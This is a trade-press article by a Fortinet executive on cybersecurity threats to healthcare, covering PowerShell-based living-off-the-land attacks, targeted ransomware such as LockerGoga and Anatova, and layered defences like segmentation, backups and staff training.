Trends plaguing healthcare cybersecurity
The average healthcare organisation spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust. - By Rajesh Maurya
The need to regularly consult threat data and update defenses is amplified in the healthcare space, where interruptions to networks can be life-threatening. This is especially true as health systems become more reliant on technology and connected devices tied directly to patients and critical patient care. In addition, the average healthcare organisation spends $1.4 million recovering from a breach, which impacts hospital revenue and can severely undermine reputation and trust — two cornerstones of patient experience and retention.
To minimise the risk of successful cyberattacks, security and IT teams must be constantly aware of the new methods designed to infiltrate networks and translate this into new tactics in their security efforts.
Threats to the healthcare space
While security teams need to remain abreast of all major threat trends — even those that seemingly only target other industries — there are a few standouts from the most recent Threat Landscape Report, which examines data collected during Q1 of 2019, that could specifically impact healthcare.
Living off the land
This refers to a style of attack that appeared consistently throughout Q1. Cybercriminals leverage pre-installed tools, such as PowerShell, that come on targeted systems and can be exploited to launch attacks. This approach facilitates evasion, as the malicious code that is injected appears to be part of a sanctioned process, making it harder for security teams to detect and define. PowerShell, which comes installed on Windows machines, is one of the most popular targets for these types of attacks. Cybercriminals use PowerShell to deliver ransomware and other malicious payloads, to encrypt data and move laterally across the network.
This is a tactic that healthcare IT teams must be highly aware of, especially given the number of IoT devices connecting to the network. Health systems are constantly deploying new connected tools as part of patient treatments, many of which were not built with security in mind. To address this, IT teams should conduct regular checks on devices to ensure no pre-installed tools have been compromised, thereby acting as an entryway into the network.
There have been several high-profile ransomware attacks this year, which have demonstrated a high degree of targeting and planning. In fact, in one instance of LockerGoga, the attackers had already done the due diligence to gain privileged credentials that enabled the execution of the malware. With these credentials, they were able to operate with minimal evasion or obfuscation tactics deployed. This indicates that they had already evaluated the network defenses and determined these measures unnecessary.
Anatova was another standout ransomware in Q1, encrypting as many files as possible and ensuring minimal chances of restoration. Overall, it looks as though criminals are moving away from a purely opportunistic model of malware distribution to focus on specifically selected networks.
With this in mind, health systems must strengthen their malware defenses and ensure they have current data backups. Hospitals are known to be targets for ransomware attacks, as they are more willing to pay to reclaim data, most likely due to deficiencies or poor planning in data recovery and continuity processes. Upon payment of the ransom, reclaimed data may be corrupted or missing, leading to a potential impact on patient safety.
Pre- and post-compromise activity
Evaluating the types of websites being leveraged and the phase in the cyber kill chain at which they were accessed provides insight into how cybercriminals structure their attacks, helping with defense efforts. It was interesting to note when pre- and post-compromise activity occurs. Pre-compromise activity is three times more likely to occur during the work week, as there is often unintentional employee involvement. Post-compromise activity, however, occurs fairly consistently across weekdays and weekends, as little to no user interface is required.
This brings to mind an important point about segmentation. Healthcare is an industry of constant uptime. The emergency department network, for example, must be running at all times, including the weekend, and cannot be halted or slowed due to an attack. However, there are other departments that close. Should a device belonging to that department log on during off time, such unusual behaviour could be an indicator of an attack. Compromised systems operating during irregular business hours to initiate or extend attacks, or to move laterally across the network, could possibly affect high-need networks like the ED. This is why healthcare systems should segment essential networks to add an extra layer of defense while isolating those devices exhibiting anomalous behaviour until their intention can be determined.
It’s now clear that cybercriminals share more than source code and sell technology on Dark Web commerce sites. They also share strategies and techniques. When that information is understood and incorporated into a security strategy, pattern and behavior marching can improve the ability to detect live threats. Attack vectors, like those just discussed, underscore the need for organisations to rethink their strategy to better future-proof and manage cyber risks.
This should start with healthcare organisations taking a layered approach to security across people, processes, and technology:
People – The vast majority of attacks still happen because someone clicks on a malicious link. Employees need to be continually educated on creating strong passwords, how to identify malicious URLs and email sources, and to not open or click on unfamiliar or unexpected email messages, links, or attachments. This should then be augmented with access management policies, including a zero trust policy, and intent-based segmentation so in the event of an incident, an attack is limited to a specific segment of the network.
Processes – Incident response plans need to include regular backups that are stored off-network, regular testing of those backups, and system restoration drills to ensure everyone knows their role so systems can be restored as quickly as possible. IT teams must always know what assets are online, where those assets are, and then be able to prioritise their access to and consumption of resources based on which are most business-critical.
Technology – Security tools need to be chosen based on their ability to be integrated together and cross-automated so they can gather, share, correlate, and consume threat intelligence across the entire distributed network in real time.
Deception technology is another tactic IT teams should make use of. Effective deception strategies make it harder for an adversary to determine which assets are fake and which are real, while tripwires embedded in these false signals increase the ability to detect an intruder. Finally, segmenting corporate networks limits exposure of critical data if there is a breach.
Healthcare systems are common targets for cyberattacks. Staying aware of popular attack vectors and strategies enables IT teams to better secure crucial network functions. Moving forward, health IT teams should keep these Threat landscape findings in mind and fortify defenses accordingly.
Rajesh Maurya is Regional Vice President, India & SAARC, Fortinet.